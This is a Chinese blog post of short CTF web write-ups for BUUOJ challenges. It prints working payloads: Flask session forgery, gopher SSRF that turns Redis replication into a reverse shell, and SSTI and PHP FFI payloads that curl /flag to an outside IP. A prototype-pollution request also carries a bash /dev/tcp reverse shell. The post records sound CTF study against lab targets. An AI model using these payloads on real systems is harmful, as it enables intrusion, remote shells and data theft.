buu-day04

最新推荐文章于 2024-04-15 17:43:23 发布
最新推荐文章于 2024-04-15 17:43:23 发布
阅读量422 收藏
点赞数
分类专栏: CTF复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anwen12/article/details/122273493
版权

0x01[HarekazeCTF2019]Easy Notes

这个题目给了源码,用户又没有后端校验,所以我们很容易想到考session的反序列化,因为(sctf考烂了)。具体分析流程可以看网上的·wp,总结就是,需要伪造以下两点:

  1. 文件名
  2. 序列化的数据

0x02 [SWPU2019]Web3

访问任意路由发现的token:keyqqqwwweee!@#$%^&*,发现是伪造session。下面就是随便操作了。

.eJyrVspMUbKqVlJIUrJS8g1xLFeq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PL0IojHIPy42MCCtOcbS1BWkoLU4tykvMTcWhoBYAbr4gMA.YdBAWg.vnOXIyBk7oZzGTjDV5lS5GVwXeo

解码之后,我们知道这才是我们需要的

{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}

运行命令

python .\flask_session_cookie_manager3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"

image-20220101195442108

不知道为什么会这样,题目估计配置多少有点问题了。

0x03 [网鼎杯 2020 玄武组]SSRFMe

读取hint.php

http://a2f4f36b-1930-46a5-b853-1b9830b9b342.node4.buuoj.cn:81/?url=http://0.0.0.0/hint.php

string(1342) " <?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
  highlight_file(__FILE__);
}
if(isset($_POST['file'])){
  file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file']);
}
"

知道了这是ssrf打redis。盲猜是打主从复制了。

$match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);这个提醒太明显了,差评

开始打。运行一个假的redis,然后

gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquit

下载

gopher://0.0.0.0:6379/_auth root
config set dbfilename exp.so
slaveof 8.142.93.103 7777
quit

记得二次url编码

gopher://0.0.0.0:6379/_auth%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%35%25%37%38%25%37%30%25%32%65%25%37%33%25%36%66%25%30%61%25%37%33%25%36%63%25%36%31%25%37%36%25%36%35%25%36%66%25%36%36%25%32%30%25%33%38%25%32%65%25%33%31%25%33%34%25%33%32%25%32%65%25%33%39%25%33%33%25%32%65%25%33%31%25%33%30%25%33%33%25%32%30%25%33%37%25%33%37%25%33%37%25%33%37%25%30%61%25%37%31%25%37%35%25%36%39%25%37%34

执行命令

gopher://0.0.0.0:6379/_auth root
module load /tmp/exp.so
system.rev 8.142.93.103 2333
quit

题目环境好像出网但是又没有完全出 我不多说了,内网的redis链接不上的主机。 我本地测试payload没问题。

gopher://0.0.0.0:6379/_auth%2520root%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
gopher://0.0.0.0:6379/_auth%2520root%250Aconfig%2520set%2520dbfilename%2520exp.so%250Aslaveof%25208.142.93.103%25207777%250Aquit
gopher://0.0.0.0:6379/_auth%2520root%250Amodule%2520load%2520%252Ftmp%252Fexp.so%250Asystem.rev%25208.142.93.103%25206666%250Aquit

0x04

curl -i -X PUT 'http://node4.buuoj.cn:27746/hurdles/!?get=flag&%26%3D%26%3D%26=%2500%0a' -u 'player:54ef36ec71201fdf9d1423fd26f97f6b' -A '1337 Browser v.9000' -H 'X-Forwarded-For:13.37.13.37,127.0.0.1' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Accept-Language:ru;' -H 'origin:https://ctf.bsidessf.net' -H 'Referer:https://ctf.bsidessf.net/challenges'

记得一点-u

0x05 [PASECA2019]honey_shop

(lzctf原题哈哈哈哈

eXuJzykDsiHS2PZlDHYn3ASpyXxWazYiTZqEwqbP
python3 flask_session_cookie_manager3.py encode -s "eXuJzykDsiHS2PZlDHYn3ASpyXxWazYiTZqEwqbP" -t "{'balance': 1338, 'purchases': []}"

0x06 [GWCTF 2019]你的名字

可以复写绕过的题目不多了。。

{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl http://8.142.93.103/ -d ` cat /flag_1s_Hera|base64`;') %}1{% endiconfigf %}

0x07 [CSAWQual 2016]i_got_id

perl 被喷得好惨呀 呜呜

参考连接: https://tsublogs.wordpress.com/2016/09/18/606/

image-20220101233621565

其实这个题目还是有点东西。首先需要猜测一波语句,然后还要会perl

https://blog.csdn.net/shangguanzhe/article/details/40432679

可以知道这个符号<>会对ARGV产生反应,获取运行的参数。并且会对参数进行open操作,后面的故事就不用多说了,就是open命令执行了。

0x08 [RCTF 2019]Nextphp

这道题目我看到FFI大概猜了一波是它,但是还是不敢确定。之前每次用ffi绕过都是payload直接一把嗦,今天发现了preload.php才知道FFI还要配合preload.php才能成功的运行。

那我们先看看preload.php的作用https://wiki.php.net/rfc/preload

查了一下,发现文档中说了这么一句image-20220101235133651

他的意思是FFI只能在文件中运行,其他文件都不行,所以我们用它来调用不就可以了吗?。

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => "int php_exec(int type, char *cmd);"
    ];

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __construct () {
    }
}

$a = new A;
echo serialize($a);

$a=unserialize('C%3a1%3a"A"%3a97%3a{a%3a3%3a{s%3a3%3a"ret"%3bN%3bs%3a4%3a"func"%3bs%3a9%3a"FFI%3a%3acdef"%3bs%3a3%3a"arg"%3bs%3a34%3a"int+php_exec(int+type,+char+*cmd)%3b"%3b}}');var_dump($a->ret->php_exec(2,'curl%208.142.93.103/`cat%20/flag`'));

所以以后在拿到配置文件要好好读,每一个文件都是有用的!!!

生成cookie必须使用一下这个文件

from flask.sessions import SecureCookieSessionInterface

secret_key = "cded826a1e89925035cc05f0907855f7"

class FakeApp:
    secret_key = secret_key


fake_app = FakeApp()
session_interface = SecureCookieSessionInterface()
serializer = session_interface.get_signing_serializer(fake_app)
cookie = serializer.dumps(
    {"history": [{"code": '__import__("os").popen("cat flag.txt").read()'}]}
)
print(cookie)

我发现网上的脚本对于python3.6+版本支持不行,最好大家还是使用python3.6或者3.5

0x09 [网鼎杯 2020 青龙组]notes

这个题目 其实我最开始猜测考点有两个地方

image-20220102002011574

看着有点像是模板渲染。但是这里的命令执行太明显了

image-20220102002039928

有一个遍历,配套的就只要成功的原型链污染,我一搜那个我没见过的模板,全网都是他的原型链。

POST /edit_note HTTP/1.1
Host: ba12a62e-bb4b-479d-8296-6e466d138ef7.node4.buuoj.cn:81
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ba12a62e-bb4b-479d-8296-6e466d138ef7.node4.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ba12a62e-bb4b-479d-8296-6e466d138ef7.node4.buuoj.cn:81/edit_note
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6
Cookie: UM_distinctid=.eJyrVspMUbKqVlJIUrJS8g20tVWq1VHKLI7PyU_PzFOyKikqTdVRKkgsLi7PLwIqVEpMyQWK6yiVFqcW5SXmpsKFagFiyxgX.Xp7n9g.Wrfpp0DVY6_pH_mpD3_l6nNTpWU
Connection: close

id=__proto__&author=bash+-i+>%26+/dev/tcp/ip/80+0>%261&raw=jj

/status触发。

0x0A [FBCTF2019]Event

event_name=a&event_address=a&event_important=__class__.__init__.__globals__[app].config

可以拿到key,然后用上面脚本伪造即可。

0x0B [WMCTF2020]Make PHP Great Again 2.0

赵总的0day不多解释。https://blog.csdn.net/weixin_39916479/article/details/111289716 (后面有机会一定复现)

0x0C [HITCON 2016]Leaking

这个题目最后我看到wp完全没有我刚看到这个题目那么震惊,我没想到是直接去读取内存,Buffer(500).然后爆破就可以了。

还以为是逃逸然后遍历全局对象。
0B [WMCTF2020]Make PHP Great Again 2.0

赵总的0day不多解释。https://blog.csdn.net/weixin_39916479/article/details/111289716 (后面有机会一定复现)

0x0C [HITCON 2016]Leaking

这个题目最后我看到wp完全没有我刚看到这个题目那么震惊,我没想到是直接去读取内存,Buffer(500).然后爆破就可以了。

还以为是逃逸然后遍历全局对象。

Dem0@
关注
专栏目录
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1664
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
BUU刷题记录(三)
山高路远
04-10 3081
buu——pwn学习 十、铁人三项(第五赛区)_2018_rop checksec一下,开启了nx保护,然后拖入ida 呃。。。应该就是比较熟悉的rop的构建了,直接上exp吧,这类题目做挺多的了: 十一、gyctf_2020_borrowstack 先做下这题,一直想完整的了解栈迁移,借着这题真正的掌握栈迁移的手法和知识点吧,先checksec一下,再拖入ida分析 里面很简单,没有什么复杂的函数,很适合借此了解栈迁移!首先read函数读取的字节数不够,只能够刚好覆盖返回地址。第二输入点的位置是b
[HarekazeCTF2019]Easy Notes
shinygod的博客
02-23 537
[HarekazeCTF2019]Easy Notes
[HarekazeCTF2019]Easy Notes-代码审计
leekos的博客,分享web安全相关知识~
08-24 241
会被替换为空,所以最终文件名就符合session文件的格式了,session文件名可控。目录下面,所以我们可以尝试session伪造一下,伪造一个session文件。如果我们能够控制session文件,就可以拿到flag了。登录之后有几个功能点,可以添加节点,然后使用。我们发现想要拿到flag的条件时。这里可以看到,导出的文件也是写到。会生成16进制字符串,
[HarekazeCTF2019]Easy Notes(session伪造)
paidx0
08-24 488
[HarekazeCTF2019]Easy Notes(session伪造)
Redis的RCE漏洞
midi
02-13 1771
前言 做ssrf时碰到个redis的主从复制([网鼎杯 2020 玄武组]SSRFMe) writeup <?php if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ highlight_file(__FILE__); } if(isset($_POST['file'])){ file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file'])
BUU刷题记录-2020.11.7
Georgeiweb的博客
11-08 854
RSA 题目:给了两个文件,一个pub.key,另一个为flag.enc 解题思路:先把pub.key文件改为txt文件,然后就可以打开,内容是rsa的公钥, 所以直接使用在线工具解出e,n 公钥解析 然后在有n=p*q再用在线工具 factordb ...
buu-BSideCF-2020-Had a bad day1】
lalalalafan的博客
11-15 2803
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含 2.读源码 ?category=php://filter/read=convert.base64-encode/resource=index.php 报错了,后端自己加上了.php,所以我们删了 ?category=php://filter/read=convert.base64-encode/resource=index 就可以得到base64编码后的源码了 解码得到源码 <?php $file = $
buu-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
qaq517384的博客
10-10 271
F12能看到提示 ?file猜测文件包含,先是伪协议读源码 ?file=php://filter/convert.base64-encode/resource=index.php <?php //index.php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['file'] : null); if (isset($file)){
buu-[CISCN2019 总决赛 Day2 Web1]Easyweb
qaq517384的博客
10-10 252
扫!(或者靠经验先试) /robots.txt 看源码发现已知的php只有user.php/image.php/index.php 然后在image.php.bak里找到源码 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); $i
2021-04-30 CTF Misc buu oj day6 5道题
LiNa_lInA_741的博客
05-02 650
这里写目录标题神秘龙卷风类型压缩包文件解题 神秘龙卷风 类型 rar压缩包分析、编码分析 压缩包文件 神秘龙卷风.rar 解题 rar压缩包加密4位密码用ARCHPR直接爆破:5463 里面txt文件打开是+.>组成,数了一下到第一个.>的+数量,是102,对着ASCII编码表看了一眼对应字母“f”,于是猜测后面应该都这样就能编码出flag{}(后证实这纯属瞎猜)。 看其他解法发现是Brainfuck编码,+表示指针指向字节加一,.表示输出指针指向内容,>表示指针加一。Brainfu
2021-04-26 CTF Misc buu oj day3 7道题
LiNa_lInA_741的博客
04-26 1486
这里写目录标题乌镇峰会种图类型图片文件解题LSB类型图片文件LSB隐写解题文件中的秘密类型图片文件解题标题 乌镇峰会种图 类型 Misc jpg图片分析 图片文件 b56cde4f-be03-4d07-a0ca-6af22284f0aa.jpg 解题 复习题,同day2里面你竟然赶我走biubiu.jpg,flag:flag{97314e7864a8f62627b26f3f998c37f1} LSB 类型 Misc png图片分析 图片文件 flag11.png LSB隐写 这里是引用 LSB全称Le
BUU刷题记录——3
weixin_43610673的博客
08-31 866
[SWPUCTF 2018]SimplePHP 可以上传到找不到上传的文件 http://05de1970-8bf0-44cd-ba69-44dd2d41c86a.node3.buuoj.cn/file.php?file=upload_file.php 直接就可以从?file读源码,还用伪协议试了半天不行。。。 先看下function.php的内容 看源码得知上传的文件在/upload/目录下 文件名只能是几种图片格式 主要代码在class.php <?php class
SICTF Round#3(WEB方向),程序员必学
最新发布
m0_61943758的博客
04-15 543
根据favicon.io得知是ThinkPHP,先拿TP漏扫工具一把梭,无果。扫描目录发现存在www.zip文件。此时我们可以借助SSRF,将目标靶机作为跳板机,访问/admin.php文件。考点是SQL注入,过滤了information_schemta,考虑无列名注入。回显型SSRF,直接包含/flag没有内容。的值等于127.0.0.1时,就输出flag,但是。成功获取到flag。
buuctf13(perl脚本GET open命令漏洞&redis主从复制&xss&ssti关键字过滤绕过&csrf)
weixin_63231007的博客
02-27 1305
[HITCON 2017]SSRFme & [网鼎杯 2020 玄武组]SSRFMe & [GWCTF 2019]mypassword & [GWCTF 2019]你的名字& [GKCTF 2021]CheckBot
CTFd的安装搭建
Landasika的博客
05-17 6326
目录 CTFd的安装搭建〇、配置一、配置python环境1、安装python3.72、安装和升级pip3二、安装docker环境1、下载docker2、Docker 镜像加速3、安装docker-compose三、配置Frpc和Frps以及配置ctfd-whale四、安装CTFd五、上传题目六、汉化 CTFd的安装搭建 〇、配置 阿里云Ubuntu18.04 CTFd docker...
[HarekazeCTF2019]baby_rop2
、moddemod
06-17 387
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './babyrop2' p = process(proc_name) # p = remote('node3.buuoj.cn', 29966) elf = ELF(proc_name) print(proc.pidof(p)) main_add..
一周刷题记录 | Web&Misc
Lemon's blog
12-03 1156
文章目录前言 前言 前端时间太忙了,现在终于有空可以安心做做题,减小与大师傅们的差距,冲冲冲!
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值